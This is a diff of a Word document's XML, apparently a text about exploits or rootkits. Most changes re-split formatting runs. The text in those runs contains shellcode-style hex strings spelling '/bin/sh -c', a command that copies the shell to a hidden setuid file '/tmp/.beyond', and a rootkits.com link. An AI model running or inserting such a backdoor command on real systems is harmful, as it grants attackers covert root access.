+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>62\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>69"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2420,15 +3926,200 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"\x6e\x2f\x73\x68\x00\x2d\x63\x00"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>73\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>68\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>00\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>63\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>00"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2437,15 +4128,132 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"cp -p /bin/sh /tmp/.beyond; chmod 4755</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>bin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>/.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>beyond</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>chmod</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 4755</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2454,9 +4262,42 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/tmp/.beyond;";</w:t>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tmp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>/.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>beyond</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>;";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2702,8 +4543,6 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -2906,6 +4745,18 @@
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="252525"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>http://rootkits.com/</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4651,7 +6502,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{AEE69B03-9432-40B7-87E9-08F50A4E8B63}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CF9D6C93-B80D-4CAA-882C-778240672D23}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
